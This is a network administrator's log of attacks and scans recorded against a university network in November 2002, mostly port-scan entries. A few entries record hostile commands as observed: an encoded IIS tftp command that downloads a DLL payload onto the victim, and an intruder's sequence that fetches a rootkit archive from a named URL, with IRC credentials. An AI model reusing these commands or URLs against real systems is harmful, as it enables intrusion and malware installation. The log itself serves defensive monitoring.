Short summary of some of the attacks against us for Nov. 2002

 year - time EASTERN source_ip[:port] (dns name, if any) attack/scan/notes


2002/11/01-02:54:19.35 80.11.204.65 (AVelizy-102-1-4-65.abo.wanadoo.fr) scannet for port 21
2002/11/01-03:03:43.28 80.11.204.65 (AVelizy-102-1-4-65.abo.wanadoo.fr) scannet for port 21
2002/11/01-05:15:20.85 216.234.161.222 (www.huannet.com) scannet for port 80
2002/11/01-05:29:57.14 216.234.161.222 (www.huannet.com) scannet for port 80
2002/11/01-08:14:17.26 80.200.134.4 () scannet for ports 21
2002/11/01-08:17:14.40 193.251.76.101 (AFontenayssB-101-2-1-101.abo.wanadoo.fr) scannet for ports 21
2002/11/01-08:23:38.37 80.200.96.28 () scannet for ports 1433
2002/11/01-08:23:51.69 80.200.96.28 (28.96-200-80.adsl.skynet.be) ICMP superscan echo of net
2002/11/01-08:37:45.74 212.194.32.90 () scannet for ports 21 139 445
2002/11/01-09:16:59.16 62.30.107.124 () scannet for ports 135
2002/11/01-10:16:10.42 146.145.36.145 () scannet for ports 135 139
2002/11/01-11:08:54.90 217.23.91.110 () scannet for ports 139
2002/11/01-11:26:29.70 66.156.93.84 () scannet for ports 139
2002/11/01-11:45:05.78 212.253.177.61 () scannet for ports 139
2002/11/01-11:45:23.67 61.152.218.10 () scannet for ports 139
2002/11/01-11:56:21.38 212.253.183.100 () scannet for ports 139
2002/11/01-11:56:32.16 66.169.118.155 () scannet for ports 139
2002/11/01-12:02:51.42 67.118.116.9 () scannet for ports 139
2002/11/01-12:20:37.45 206.96.78.20 () scannet for ports 139
2002/11/01-12:45:17.75 12.91.110.215 (215.washington-04rh15rt.dc.dial-access.att.net) scannet for ports 139
2002/11/01-12:56:39.74 212.2.223.156 () scannet for ports 139
2002/11/01-12:57:42.55 200.69.25.153 () scannet for ports 80
2002/11/01-12:58:30.71 66.190.156.118 () scannet for ports 139
2002/11/01-13:11:26.22 210.222.8.72 () scannet for ports 443 80
2002/11/01-13:24:56.26 218.149.135.11 () scannet for ports 139
2002/11/01-13:30:12.90 200.206.183.119 (200-206-183-119.dsl.telesp.net.br) scannet for ports 139
2002/11/01-13:52:37.49 65.210.209.210 () scannet for ports 139
2002/11/01-13:52:43.30 65.58.133.30 () scannet for ports 139
2002/11/01-13:57:47.93 206.96.79.35 () scannet for ports 139
2002/11/01-13:58:09.27 62.224.34.27 () scannet for ports 139
2002/11/01-14:19:42.86 200.161.1.85 (200-161-1-85.sercabc.com.br) scannet for ports 139
2002/11/01-14:32:05.23 216.35.169.220 () scannet for ports 80
2002/11/01-14:34:40.47 200.67.24.242 (dsl-200-67-24-242.prodigy.net.mx) scannet for ports 139
2002/11/01-15:09:31.22 131.164.176.51 (0x83a4b033.abnxx2.adsl-dhcp.tele.dk) scannet for ports 139
2002/11/01-15:10:00.79 80.59.177.10 () scannet for ports 139
2002/11/01-15:10:22.00 200.28.37.115 (115-37-28.dial.terra.cl) scan net for ports 445
2002/11/01-15:10:22.58 148.221.69.176 (dup-148-221-69-176.prodigy.net.mx) scannet for ports 139
2002/11/01-16:41:41.25 65.77.123.248 () scannet for ports 80
2002/11/01-16:50:10.52 24.192.162.163 () scannet for ports 445
2002/11/01-18:25:56.57 202.64.115.18 () scannet for ports 443 80
2002/11/01-18:50:00.13 65.43.210.142 () scannet for ports 139
2002/11/01-19:59:09.23 62.252.128.7 () scannet for ports 80
2002/11/01-20:03:16.45 68.85.229.155 () scannet for ports 80 445
2002/11/01-20:04:08.49 62.252.128.10 () scannet for ports 80
2002/11/01-22:04:51.47 64.244.63.199 () scannet for ports 80
2002/11/01-23:06:48.43 217.35.2.140 () scannet for ports 445 80 139
2002/11/02-01:10:08.58 209.137.6.57 () scannet for ports 1433
2002/11/02-01:39:29.26 66.9.24.140 () scannet for ports 80 443
2002/11/02-02:06:15.76 216.180.243.50 () scannet for ports 80 443
2002/11/02-06:09:26.41 212.194.90.97 () scannet for ports 135 445 139
2002/11/02-06:13:07.09 211.204.180.222 () scannet for ports 1433
2002/11/02-06:15:22.52 213.149.183.213 () scannet for ports 445 135
2002/11/02-09:15:35.00 24.93.102.1 (dhcp93102001.columbus.rr.com) portscan prime
2002/11/02-09:33:31.71 66.51.127.164 () scannet for ports 22
2002/11/02-11:45:52.68 24.242.32.184 (cs2424232-184.hot.rr.com) ICMP superscan echo of net
2002/11/02-12:45:56.58 218.30.21.45 () scannet for ports 1433
2002/11/02-13:12:50.85 204.0.95.70 (ip-204-0-95-70.ionex.com) scannet for ports 80
2002/11/02-13:31:55.61 24.125.8.145 () scannet for ports 80
2002/11/02-13:41:59.53 213.105.70.105 () scannet for ports 139 445
2002/11/02-13:52:21.26 156.17.227.217 (217.t14.ds.pwr.wroc.pl) scannet for ports 1433
2002/11/02-13:52:29.16 217.136.113.189 () scannet for ports 21
2002/11/02-14:58:24.86 80.142.47.12 () scannet for ports 80
2002/11/02-15:02:17.18 67.84.84.44 () scannet for ports 139 445
2002/11/02-16:40:50.77 24.30.102.125 () scannet for ports 80 443
2002/11/02-17:12:53.74 217.34.79.212 () scannet for ports 80 139 445
2002/11/02-17:29:31.33 205.252.28.70 () scannet for ports 1433
2002/11/02-17:55:15.18 24.214.18.95 (user-24-214-18-95.knology.net) FormMail.gci relay attack
2002/11/02-19:34:23.32 24.214.18.95 (user-24-214-18-95.knology.net) FormMail.gci relay attack
2002/11/02-20:17:13.57 148.243.228.163 (na-148-243-228-163.na.avantel.net.mx) scannet for ports 443 80
2002/11/03-02:34:06.98 206.135.69.171 () scannet for ports 1433
2002/11/03-02:35:53.12 65.67.67.95 () scannet for ports 139 80 445
2002/11/03-04:47:44.72 209.180.104.139 () scannet for ports 443 80
2002/11/03-05:12:07.51 211.73.160.91 () scannet for ports 139 1433 80
2002/11/03-09:07:48.84 216.221.70.156 () scannet for ports 139
2002/11/03-10:31:56.98 67.68.80.188 () scannet for ports 139 80 445 135
2002/11/03-11:27:20.12 210.243.25.18 () scannet for ports 80
2002/11/03-11:54:54.15 61.218.93.238 () scannet for ports 80
2002/11/03-19:56:00.52 200.14.32.9 () scannet for ports 139
2002/11/03-21:06:18.38 208.189.184.61 () scannet for ports 80
2002/11/03-22:07:01.19 68.68.16.2 () scannet for ports 445
2002/11/03-23:43:04.96 165.194.161.189 () scannet for ports 445
2002/11/03-23:44:20.70 211.63.151.78 () scannet for ports 445
2002/11/03-23:54:40.25 210.205.202.230 () scannet for ports 1433
2002/11/04-02:11:00.63 210.221.52.53 () scannet for ports 139 445
2002/11/04-02:59:15.97 66.222.40.38 () scannet for ports 80
2002/11/04-03:37:58.99 207.10.86.190 () scannet for ports 4899
2002/11/04-03:55:22.87 24.184.1.40 () scannet for ports 445 139
2002/11/04-04:11:35.90 137.204.65.74 (hires.bo.astro.it) scannet for ports 445
2002/11/04-04:18:45.02 165.194.70.33 () scannet for ports 445
2002/11/04-04:24:37.50 165.132.225.109 () scannet for ports 139 445
2002/11/04-04:55:26.95 144.136.77.241 (CPE-144-136-77-241.nsw.bigpond.net.au) scannet for ports 445
2002/11/04-05:13:58.24 165.132.128.242 () scannet for ports 445
2002/11/04-05:19:13.81 211.56.131.165 () scannet for ports 445
2002/11/04-05:24:20.62 211.190.25.113 () scannet for ports 139 445
2002/11/04-06:01:19.25 80.14.178.85 () scannet for ports 21
2002/11/04-07:17:33.70 211.49.95.18 (s211-49-95-18.thrunet.ne.kr) scannet for ports 445
2002/11/04-07:19:30.08 210.205.158.44 (s210-205-158-44.thrunet.ne.kr) scannet for ports 445 139
2002/11/04-08:11:44.50 80.13.200.132 (AToulouse-105-1-12-132.abo.wanadoo.fr) scannet for ports 21
2002/11/04-08:44:53.50 24.47.216.22 (ool-182fd816.dyn.optonline.net) probe/attack 132.235.4.70 ports 139,445
2002/11/04-09:02:31.84 132.235.151.47 (dhcp-151-047.west-green.ohiou.edu) scannet for ports 21
2002/11/04-09:02:32.66 24.47.216.22 (ool-182fd816.dyn.optonline.net) scannet for ports 445 139
2002/11/04-09:07:15.24 211.183.1.58 () scannet for ports 445
2002/11/04-10:54:10.91 200.206.142.148 (200-206-142-148.dsl.telesp.net.br) scannet for ports 139
2002/11/04-13:05:35.96 80.135.152.245 (p508798F5.dip.t-dialin.net) scannet for ports 80
2002/11/04-13:20:40.44 24.214.18.95 (user-24-214-18-95.knology.net) try to relay email via web server
2002/11/04-14:11:02.18 24.208.177.138 (dhcp024-208-177-138.columbus.rr.com) probe 132.235.1.[1,2]:445
2002/11/04-14:21:46.14 62.7.160.89 (host62-7-160-89.webport.bt.net) scannet for ports 139
2002/11/04-14:26:39.64 65.211.21.27 () scannet for ports 80
2002/11/04-14:52:14.20 200.178.222.165 () scannet for ports 139
2002/11/04-15:16:05.47 24.44.173.225 (ool-182cade1.dyn.optonline.net) scannet for ports 445
2002/11/04-15:30:46.51 167.152.251.101 (UUNET Technologies, VA,US) RPC EXPLOIT statdx attacks against multiple ips
2002/11/04-15:42:59.92 167.152.251.101 () scannet for ports 111
2002/11/04-15:55:03.33 24.45.220.248 (ool-182ddcf8.dyn.optonline.net) scannet for ports 139 445
2002/11/04-16:55:01.20 64.251.13.35 (ool-43524777.dyn.optonline.net) scannet for ports 445
2002/11/04-17:29:03.87 207.96.227.175 (ip175.227-96-207.sogetel.net) scannet with ICMP superscan echo
2002/11/04-17:29:47.63 207.96.227.175 (ip175.227-96-207.sogetel.net) scannet for ports 33 ports
2002/11/04-17:48:02.55 24.102.178.19 () scannet for ports 445
2002/11/04-17:49:17 24.93.102.1 (dhcp93102001.columbus.rr.com) portscan prime
2002/11/04-18:13:41.27 24.192.94.13 (CPE00045a6cd5b1-CM00803786cdab.cpe.net.cable.rogers.com) scannet for ports 80 445
2002/11/04-19:06:17.63 218.50.138.28 () scannet for ports 445
2002/11/04-19:11:57.48 61.180.5.183 () scannet for ports 139
2002/11/04-19:13:22.63 24.192.188.17 (CPE00d0096efec1-CM008037864c67.cpe.net.cable.rogers.com) scannet for ports 445
2002/11/04-19:50:19.32 194.67.46.3 (ts5-a3.Spb.dial.sovam.com) scannet for ports 1433
2002/11/04-20:19:47.15 143.248.182.41 (dor18241.kaist.ac.kr) scannet for ports 139 445
2002/11/04-20:53:19.37 67.82.71.119 () scannet for ports 139 445
2002/11/04-20:54:38.62 216.251.74.140 () scannet for ports 135 445 139
2002/11/04-21:09:30.60 24.93.101.24 (dhcp93101024.columbus.rr.com) scannet for ports 44 ports
2002/11/04-21:55:24.22 165.132.244.185 () scannet for ports 139 445
2002/11/04-22:26:48.03 143.248.207.93 (dor20793.kaist.ac.kr) scannet for ports 445
2002/11/04-22:45:58.10 211.190.216.7 () scannet for ports 445
2002/11/04-23:40:58.37 165.132.148.140 () scannet for ports 445
2002/11/05-00:36:32.12 211.207.109.105 () scannet for ports 139 445
2002/11/05-00:54:21.50 143.248.8.101 (aha2.kaist.ac.kr) scannet for ports 139 445
2002/11/05-00:55:17.70 165.132.128.245 () scannet for ports 139 445
2002/11/05-01:13:11.30 140.109.214.148 () scannet for ports 139 445
2002/11/05-01:36:09.04 203.228.113.44 () scannet for ports 445
2002/11/05-01:50:19.66 165.194.144.212 () scannet for ports 445
2002/11/05-01:51:48.05 136.152.197.244 (tnt-1-308.HIP.Berkeley.EDU) scannet for ports 524 445 139
2002/11/05-02:23:46.33 203.249.18.152 () scannet for ports 445
2002/11/05-02:47:18.86 61.177.251.125 (CHINANET jiangsu province network) 1. attack IIS server with command:
2002/11/05-02:47:18.86 61.177.251.125 (CHINANET jiangsu province network) 2. tftp%20-i%20132.235.32.107%20GET%20cool.dll%20c:\httpodbc.dll
2002/11/05-03:52:03.12 211.186.98.235 () scannet for ports 445
2002/11/05-04:18:22.45 211.208.150.144 () scannet for ports 445
2002/11/05-04:28:21.32 12.160.56.2 (firewall.dc.akqa.com) scannet for ports 80
2002/11/05-04:34:23.66 218.234.4.173 () scannet for ports 445
2002/11/05-04:38:47.63 206.246.220.57 () scannet for ports 139
2002/11/05-05:03:09.83 61.99.254.105 () scannet for ports 139 445
2002/11/05-05:21:05.39 128.205.219.96 (resnet219-96.resnet.buffalo.edu) scannet for ports 21
2002/11/05-05:37:28.96 168.188.33.190 () scannet for ports 445
2002/11/05-05:47:44.60 134.95.208.92 () scannet for ports 139 445
2002/11/05-06:05:15.24 24.192.193.113 (CPE0050bac0caf3-CM00e06f167370.cpe.net.cable.rogers.com) scannet for ports 445
2002/11/05-06:05:24.10 211.192.4.215 () scannet for ports 139 445
2002/11/05-06:24:42.19 210.205.153.188 (s210-205-153-188.thrunet.ne.kr) scannet for ports 139 445
2002/11/05-06:27:43.43 144.136.184.107 (CPE-144-136-184-107.sa.bigpond.net.au) scannet for ports 445
2002/11/05-06:27:54.41 12.222.87.179 (12-222-87-179.client.insightBB.com) scannet for ports 445
2002/11/05-06:38:31.03 134.208.36.228 (134-208-36-228.ndhu.edu.tw) scannet for ports 445
2002/11/05-06:41:05.70 211.207.1.215 () scannet for ports 445
2002/11/05-07:11:43.72 24.186.62.66 (ool-18ba3e42.dyn.optonline.net) scannet for ports 445
2002/11/05-08:04:26.62 200.222.240.225 () scannet for ports 139
2002/11/05-08:30:19.90 218.164.10.7 () scannet for ports 139
2002/11/05-08:34:08.06 139.174.100.47 (frank.in.tu-clausthal.de) packets to 239.255.255.250:1900 (MSN UPN broadcast)
2002/11/05-09:14:32.19 24.186.62.66 () scannet for ports 445 139
2002/11/05-09:27:33.90 211.243.45.102 () scannet for ports 445
2002/11/05-09:35:10.29 195.87.122.178 () scannet for ports 139
2002/11/05-09:36:51.18 210.203.183.139 () scannet for ports 139
2002/11/05-09:55:26.15 4.35.215.34 () scannet for ports 443 80
2002/11/05-10:23:34.13 4.35.215.34 () scannet for ports 80
2002/11/05-10:30:14.09 200.68.13.146 () scannet for ports 139
2002/11/05-10:37:25.55 200.158.20.50 (200-158-20-50.dsl.telesp.net.br) scannet for ports 139
2002/11/05-10:40:49.82 66.105.117.124 () scannet for ports 139
2002/11/05-10:44:58.93 213.224.133.122 () scannet for ports 139
2002/11/05-10:53:30.84 218.15.204.62 () scannet for ports 139
2002/11/05-11:08:54.71 80.117.213.153 () scannet for ports 139
2002/11/05-11:11:35.11 62.136.225.106 () scannet for ports 139
2002/11/05-11:20:05.09 209.102.208.54 () scannet for ports 139
2002/11/05-11:22:01.88 195.232.50.28 (fra-tgn-oyr-vty28.as.wcom.net) scannet for ports 21
2002/11/05-11:22:19.35 203.107.247.110 () scannet for ports 139
2002/11/05-11:23:23.62 61.145.137.198 () scannet for ports 139
2002/11/05-11:33:37.38 212.77.206.67 () scannet for ports 139
2002/11/05-11:33:57.75 128.248.32.220 (k031b.nurs.uic.edu) scannet for ports 445
2002/11/05-11:34:00.73 80.129.245.36 () scannet for ports 80
2002/11/05-11:34:35.17 68.21.3.38 () scannet for ports 139
2002/11/05-12:11:16.37 66.192.39.131 () scannet for ports 22
2002/11/05-12:15:47.36 212.33.50.72 (cm50-72.liwest.at) 1. hacked into gator, condor w/ telnet buff overflow attack.
2002/11/05-12:15:47.36 212.33.50.72 (cm50-72.liwest.at) 2. , ftp wsunget from ftp.xoom.it (datarex/aerox)
2002/11/05-12:15:47.36 212.33.50.72 (cm50-72.liwest.at) 3. use wsunget ot get http://members.xoom.virgilio.it/datarex/sunkit.tar
2002/11/05-12:15:47.36 212.33.50.72 (cm50-72.liwest.at) 4. access irc channel irc.crew as NICK Me_PiAcE` PASS DaNiElItO
2002/11/05-12:25:57.91 208.44.31.13 () scannet for ports 139 445
2002/11/05-12:28:09.72 218.14.147.40 () scannet for ports 139
2002/11/05-12:38:19.30 61.169.199.140 () scannet for ports 139
2002/11/05-12:39:38.23 195.232.50.28 (fra-tgn-oyr-vty28.as.wcom.net) connect to sshd port 54000 on condor (hacker port)
2002/11/05-12:59:53.03 141.156.64.228 (client-141-156-64-228.bellatlantic.net) scannet for ports 139
2002/11/05-13:01:00.98 142.161.111.31 (wpg-res-142-161-111-31.mts.net) scannet for ports 139
2002/11/05-13:07:27.67 200.205.205.254 (200-205-205-254.dial-up.telesp.net.br) scannet for ports 139
2002/11/05-13:07:34.43 194.230.239.136 (pop-ls-5-1-dialup-136.freesurf.ch) scannet for ports 139
2002/11/05-13:22:43.82 200.72.57.179 () scannet for ports 139
2002/11/05-13:23:15.27 66.59.187.177 () scannet for ports 139 445
2002/11/05-13:36:19.07 200.67.226.3 () scannet for ports 139
2002/11/05-13:43:10.87 140.121.181.209 (sq.NTOU.edu.tw) scannet for ports 80
2002/11/05-13:43:53.88 217.3.21.97 () scannet for ports 139
2002/11/05-13:56:18.45 137.28.224.129 (University of Wisconsin) scannet for ports 139 445
2002/11/05-14:12:39.37 24.117.94.124 () scannet for ports 445
2002/11/05-14:12:59.61 206.180.128.240 () scannet for ports 139 445
2002/11/05-14:22:42.34 200.62.36.76 () scannet for ports 139
2002/11/05-14:39:19.68 199.35.111.30 (dsc02-sji-ca-1-30.rasserver.net) scannet for ports 445 139
2002/11/05-14:48:33.12 200.53.131.9 () scannet for ports 139
2002/11/05-15:06:06.89 200.28.37.115 () scannet for ports 139
2002/11/05-15:07:33.35 68.161.59.234 () scannet for ports 139
2002/11/05-15:08:27.02 65.223.127.154 () scannet for ports 25
2002/11/05-15:08:42.04 65.223.127.153 () scannet for ports 25
2002/11/05-15:09:39.23 65.223.127.155 () scannet for ports 25
2002/11/05-15:25:05.07 212.253.184.209 () scannet for ports 139
2002/11/05-15:28:32.23 80.136.246.168 () scannet for ports 80 21 57
2002/11/05-15:35:32.46 140.138.137.39 (fz3426-1.eed.yzu.edu.tw) scannet for ports 443 80
2002/11/05-15:35:33.25 208.191.171.53 () scannet for ports 139
2002/11/05-15:53:03.79 195.226.101.119 (stu1ir200-101-119.ras.tesion.net) scannet for ports 139
2002/11/05-15:57:38.74 213.36.66.36 () scannet for ports 139
2002/11/05-16:08:15.08 200.30.202.82 () scannet for ports 139
2002/11/05-16:43:23.23 80.24.45.53 () scannet for ports 139
2002/11/05-17:05:56.52 216.232.81.1 () scannet for ports 139
2002/11/05-17:08:14.82 218.155.10.85 () scannet for ports 22
2002/11/05-17:20:23.67 207.66.9.117 () scannet for ports 139
2002/11/05-17:21:32.52 24.216.46.44 () scannet for ports 139
2002/11/05-17:33:38.80 200.85.39.216 () scannet for ports 139
2002/11/05-17:47:25.16 64.251.145.203 () scannet for ports 445 139
2002/11/05-18:09:13.59 206.21.20.133 (host133.osu-btc.com) DNS zone transfer- ohiou.edu.
2002/11/05-18:09:28.39 217.81.242.10 () scannet for ports 80
2002/11/05-18:09:49.36 61.101.6.120 () scannet for ports 139 445
2002/11/05-18:13:11.27 61.145.138.74 () scannet for ports 139
2002/11/05-18:16:57.41 211.191.147.130 () scannet for ports 445
2002/11/05-18:48:55.51 137.28.244.251 (University of Wisconsin) scannet for ports 445
2002/11/05-18:56:38.41 12.231.64.236(12-231-64-236.client.attbi.com) scannet for ports 445
2002/11/05-19:01:56.61 152.149.136.150 () scannet for ports 445
2002/11/05-19:03:06.57 24.187.247.236 () scannet for ports 139 445
2002/11/05-19:03:36.72 217.99.224.72 () scannet for ports 139
2002/11/05-19:21:24.68 218.164.105.213 () scannet for ports 139
2002/11/05-19:23:39.82 61.58.200.206 () scannet for ports 139
2002/11/05-19:31:11.28 133.54.166.244 (Japan) scannet for ports 139 445
2002/11/05-19:34:18.61 208.139.151.103 () scannet for ports 139
2002/11/05-20:09:00.20 24.188.49.93 () scannet for ports 445
2002/11/05-20:12:46.92 65.92.37.154 () scannet for ports 139
2002/11/05-20:16:51.22 67.83.151.212 () scannet for ports 445 139
2002/11/05-20:19:20.55 80.49.129.126 () scannet for ports 80 443
2002/11/05-20:47:06.35 210.132.224.126 () scannet for ports 139
2002/11/05-21:12:28.68 62.251.182.134 () scannet for ports 139
2002/11/05-21:14:21.60 210.117.97.221 () scannet for ports 445
2002/11/05-22:05:48.00 211.192.166.88 () scannet for ports 445
2002/11/05-22:12:57.96 61.177.255.123 (CHINANET jiangsu province network( IIS attack - tftp%20-i%20132.235.48.115%20GET%20cool.dll
2002/11/05-22:39:44.01 67.84.130.240 () scannet for ports 139 445
2002/11/05-23:11:14.60 132.235.151.47 (dhcp-151-047.west-green.ohiou.edu) scannet for ports 21
2002/11/05-23:11:14.60 132.235.151.47 (dhcp-151-047.west-green.ohiou.edu) scannet for ports 21
2002/11/06-01:05:57.08 217.225.234.62 () scannet for ports 80
2002/11/06-02:16:52.30 61.61.138.6 () scannet for ports 80
2002/11/06-02:17:25.94 61.61.138.6 () scannet for ports 443 80
2002/11/06-02:58:14.88 216.123.27.102 (Derivion,Norcross GA,US) RPC EXPLOIT statdx attack
2002/11/06-02:59:28.79 216.123.27.102 () scannet for ports 111
2002/11/06-03:12:11.97 80.13.186.176 () scannet for ports 21
2002/11/06-07:18:22.85 24.148.62.190 (24-148-62-190.na.21stcentury.net) scannet for ports 80
2002/11/06-08:10:41.11 211.159.26.195 () scannet for ports 21
2002/11/06-08:57:08.47 24.88.80.141 (cae88-80-141.sc.rr.com) scannet for ports 139
2002/11/06-10:07:58.84 200.67.109.195 (dsl-200-67-109-195.prodigy.net.mx) scannet for ports 139
2002/11/06-10:23:33.72 204.86.58.5 () scannet for ports 139
2002/11/06-10:44:07.87 219.80.61.88 (88.61.80.219.isp.tfn.net.tw) scannet for ports 139
2002/11/06-10:44:46.25 216.175.120.41 (user-vcauu19.dsl.mindspring.com) scannet for ports 80
2002/11/06-10:51:03.74 213.28.229.199 (lpr-6c7.cable.inet.fi) scannet for ports 139
2002/11/06-11:40:47.27 212.76.32.13 (acn.pl) scannet for ports 139
2002/11/06-11:57:55.74 217.136.169.18 (18.169-136-217.adsl.skynet.be) scannet for ports 139
2002/11/06-11:58:27.78 195.175.116.206 (nwusr-9421.dial-in.ttnet.net.tr) scannet for ports 139
2002/11/06-12:14:15.69 148.223.139.93 (customer-148-223-139-93.uninet.net.mx) scannet for ports 139
2002/11/06-12:57:57.27 200.40.215.247 (r200-40-215-247.adsl.anteldata.net.uy) scannet for ports 139
2002/11/06-13:13:42.94 66.136.242.137 (adsl-66-136-242-137.dsl.wchtks.swbell.net) scannet for ports 139
2002/11/06-13:42:33.72 80.33.175.43 (43.Red-80-33-175.pooles.rima-tde.net) scannet for ports 139
2002/11/06-13:50:03.09 213.204.139.132 (132.ppp139.rsd.worldonline.se) scannet for ports 139
2002/11/06-14:05:53.32 200.67.24.42 (dsl-200-67-24-42.prodigy.net.mx) scannet for ports 139
2002/11/06-14:21:28.53 132.235.223.152 (snapemsys.hhs.ohiou.edu) scannet for ports 139 445
2002/11/06-14:25:35.78 218.49.112.107 () scannet for ports 139
2002/11/06-14:29:19.88 132.235.223.152 (snapemsys.hhs.ohiou.edu) scan/attack net on port 139 and 445 180 times/ip
2002/11/06-14:32:39.05 80.33.145.74 (74.Red-80-33-145.pooles.rima-tde.net) scannet for ports 139
2002/11/06-15:22:05.81 217.2.117.230 (pD90275E6.dip.t-dialin.net) scannet for ports 139
2002/11/06-15:40:51.02 208.180.8.177 (tl7-8-177.tca.net) scannet for ports 80
2002/11/06-15:42:41.13 207.135.128.223 (wasatchf.users.xmission.com) scannet for ports 80
2002/11/06-16:49:21.58 213.68.67.196 () scannet for ports 1433
2002/11/06-17:23:34.38 63.148.41.28 () scannet for ports 1433
2002/11/06-17:48:46.24 218.242.56.104 () scannet for ports 25 1080
2002/11/06-18:50:01.25 200.164.226.139 () scannet for ports 139
2002/11/06-20:31:04.52 62.110.86.3 (host3-86.pool62110.interbusiness.it) scannet for ports 443 80
2002/11/06-22:59:02.72 216.56.56.49 () scannet for ports 80
2002/11/06-23:53:52.95 61.177.251.125 (CHINANET jiangsu province network) 1. attack IIS server with command:
2002/11/06-23:53:52.95 61.177.251.125 (CHINANET jiangsu province network) 2. tftp%20-i%20132.235.32.107%20GET%20cool.dll
2002/11/07-00:48:29.07 136.165.70.32 (a48169.delphi.louisville.edu) scannet for ports 139 445
2002/11/07-00:48:45.54 136.165.70.32 (a48169.delphi.louisville.edu) scannet for ports 139 445
2002/11/07-00:49:24.19 12.235.165.137 (12-235-165-137.client.attbi.com) scannet for ports 80
2002/11/07-01:02:06.53 208.158.2.245 () scannet for ports 80
2002/11/07-01:09:15.43 198.187.40.34 () scannet for ports 139 445
2002/11/07-07:18:45.41 80.51.246.45 () scannet for ports 80
2002/11/07-07:19:55.50 80.51.246.45 () scannet for ports 80
2002/11/07-07:26:39.48 61.170.144.111 () scannet for ports 8000 8080 80
2002/11/07-07:36:36.99 80.205.84.101 (host101-84.pool80205.interbusiness.it) scannet for ports 139
2002/11/07-08:04:25.96 151.26.9.147 (ppp-147-9.26-151.libero.it) scannet for ports 139
2002/11/07-08:08:55.46 63.200.112.133 (adsl-63-200-112-133.dsl.mtry01.pacbell.net) scannet for ports 139
2002/11/07-08:09:01.01 24.76.216.57 (h24-76-216-57.va.shawcable.net) scannet for ports 139
2002/11/07-08:40:42.48 61.171.19.86 () scannet for ports 139
2002/11/07-09:07:13.61 61.230.209.24 (61-230-209-24.HINET-IP.hinet.net) scannet for ports 139
2002/11/07-09:07:26.57 218.162.33.184 (218-162-33-184.HINET-IP.hinet.net) scannet for ports 139
2002/11/07-09:10:32.54 80.117.6.252 (host252-6.pool80117.interbusiness.it) scannet for ports 139
2002/11/07-09:29:31.22 217.226.196.184 (pD9E2C4B8.dip.t-dialin.net) scannet for ports 57 80
2002/11/07-09:30:52.58 80.15.39.24 (AAjaccio-101-1-5-24.abo.wanadoo.fr) scannet for ports 21
2002/11/07-09:56:41.47 67.83.151.212 (ool-435397d4.dyn.optonline.net) scannet for ports 445 139
2002/11/07-10:49:13.85 200.162.208.19 (200.162.208.19.sao.ajato.com.br) scannet for ports 139
2002/11/07-11:27:19.73 218.151.172.209 () scannet for ports 139
2002/11/07-11:49:55.64 61.98.115.113 () scannet for ports 139
2002/11/07-12:08:55.09 130.67.128.27 (ti200720a145-0027.dialup.online.no) scannet for ports 139
2002/11/07-12:10:04.31 61.38.214.208 () scannet for ports 139
2002/11/07-13:23:03.23 200.207.117.115 (200-207-117-115.dsl.telesp.net.br) scannet for ports 139
2002/11/07-13:53:39.66 217.136.7.170 (170.7-136-217.adsl.skynet.ben) scannet for ports 21
2002/11/07-13:53:42.71 193.52.69.194 (websrv.abes.fr) scannet for ports 139
2002/11/07-13:54:38.21 206.49.76.213 () scannet for ports 139
2002/11/07-14:23:50.44 151.28.10.190 (ppp-190-10.28-151.libero.it) scannet for ports 139
2002/11/07-14:48:38.61 213.93.82.251 (e82251.upc-e.chello.nl) scannet for ports 139
2002/11/07-15:16:52.85 66.87.194.214 (cpe-66-87-194-214.tx.sprintbbd.net) scannet for ports 139
2002/11/07-15:49:13.23 200.46.89.226 () scannet for ports 80
2002/11/07-15:59:42.84 64.116.177.98 (pool.dial-up.compuservice.net) scannet for ports 139
2002/11/07-16:40:26.30 4.65.254.218 (evrtwa1-ar9-4-65-254-218.evrtwa1.dsl-verizon.net) scannet for ports 139
2002/11/07-18:02:15.28 80.13.207.128 (ALagny-103-1-2-128.abo.wanadoo.fr) scannet for ports 21 445 1433 80
2002/11/07-18:54:18.51 213.245.220.230 () scannet for ports 21
2002/11/07-19:03:14.95 200.48.245.51 (ppp02051.terra.com.pe) scannet for ports 139
2002/11/07-19:08:24.35 62.211.237.5 () scannet for ports 8080 80 3128 8000
2002/11/07-19:19:53.43 24.129.104.224 (c-24-129-104-224.se.client2.attbi.com) scannet for ports 80
2002/11/07-20:00:19.97 205.149.185.169 () scannet for ports 445 139
2002/11/08-01:26:18.76 158.39.21.252 (HIN1252.hin.no) scannet for ports 1433
2002/11/08-04:46:08.95 216.173.214.82 () scannet for ports 1433
2002/11/08-05:12:54.76 62.30.107.124 (pc-62-30-107-124-az.blueyonder.co.uk) scannet for ports 445 135
2002/11/08-06:14:43.83 24.42.123.225 (CPE013469903043.cpe.net.cable.rogers.com) scannet for ports 445
2002/11/08-06:15:26.60 24.218.248.197 (h00b0d0141f7f.ne.client2.attbi.com) scannet for ports 445
2002/11/08-06:37:05.91 64.165.156.131 (adsl-64-165-156-131.dsl.lsan03.pacbell.net) scannet for ports 1433
2002/11/08-09:03:49.18 200.189.6.173 () scannet for ports 139
2002/11/08-09:05:27.10 24.214.18.95 (user-24-214-18-95.knology.net) try to use web server on ace to relay mail
2002/11/08-09:20:37.60 200.85.35.41 () scannet for ports 139
2002/11/08-10:03:55.03 80.9.77.135 () scannet for ports 139
2002/11/08-10:04:00.00 61.171.237.122 () scannet for ports 139
2002/11/08-11:21:51.62 24.196.28.93 () scannet for ports 139
2002/11/08-11:31:22.54 66.12.52.22 () scannet for ports 80
2002/11/08-11:34:45.39 200.168.12.104 () scannet for ports 139
2002/11/08-11:34:53.80 80.225.143.97 () scannet for ports 139
2002/11/08-12:01:19.80 24.245.46.159 () scannet for ports 445
2002/11/08-12:11:15.18 209.88.55.16 () scannet for ports 139
2002/11/08-13:00:02.68 62.147.25.76 () scannet for ports 139
2002/11/08-13:20:54.59 62.158.2.72 () scannet for ports 139
2002/11/08-13:23:26.85 200.196.53.145 () scannet for ports 443
2002/11/08-13:50:19.66 80.13.252.12 () scannet for ports 139
2002/11/08-14:10:04.14 67.35.37.218 () scannet for ports 139
2002/11/08-14:22:45.59 24.160.80.176 () scannet for ports 80 445
2002/11/08-14:43:47.38 155.58.184.184 () scannet for ports 139
2002/11/08-15:03:22.72 80.13.40.198 () scannet for ports 139
2002/11/08-15:08:24.81 24.184.27.44 () scannet for ports 139
2002/11/08-15:13:32.26 200.226.54.99 () scannet for ports 139
2002/11/08-15:15:21.43 217.208.44.192 () scannet for ports 139
2002/11/08-15:29:23.16 66.85.17.66 () scannet for ports 139
